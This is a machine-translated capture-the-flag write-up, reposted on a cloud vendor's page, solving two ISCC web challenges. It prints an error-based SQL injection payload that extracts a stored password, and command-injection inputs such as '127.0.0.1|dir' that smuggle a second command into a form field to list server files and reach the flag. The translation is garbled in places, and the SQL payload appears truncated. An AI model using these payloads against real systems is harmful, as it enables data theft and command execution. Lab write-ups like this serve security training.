Home > Developer > Web Develop

"CTF Web" ISCC Web 2 Records

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

By chance to see the game, I wait for slag slag to do two questions, the rest of the topic work too busy no time to continue to do.

Question 1th SQL injection: Topic knowledge 
   考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php
The process of doing the problem

First step: Inject Playload

    User=flag&pass= ' or Updatexml (1,concat (0x7e, (select pw from user limit), 0) # '

Step Two: Injection effect

Step three: Get the source code, know that the user named flag, using the injected password login can get flag

    The user name is the flag password: *75dbba7b5806e761411    loggedin! flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

Related source

Http://101.200.145.44/web1//index.php.txt

Key
 
 
    
  
  
       
   
    1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
      2.  
  
    
 
 
Question 2nd: Topic knowledge
   考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php
The process of doing the problem
First step: Get the file name
    127.0.0.1|dir    or    127.0.0.1&&dir

Execution results
1c9976c230da289c1c359cd2a7c02d48  index.php  index.php.txt
Step two: Get the file name again
    127.0.0.1|dir 1c9976c230da289c1c359cd2a7c02d48

Execution results
flag.php
Step Three: Direct access

 
 
    
  
  
       
   
    1. 连接URL地址直接访问
      2.  
   
    2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php 
      3.  
  
    
 
 
Related source
<?phpheader ("content-type:text/html; Charset=utf-8 "); >
Key
 
  
    
  
   
       
    
    1.  flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}
      2.  
   
    
 
  


"CTF Web" ISCC Web 2 Records

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More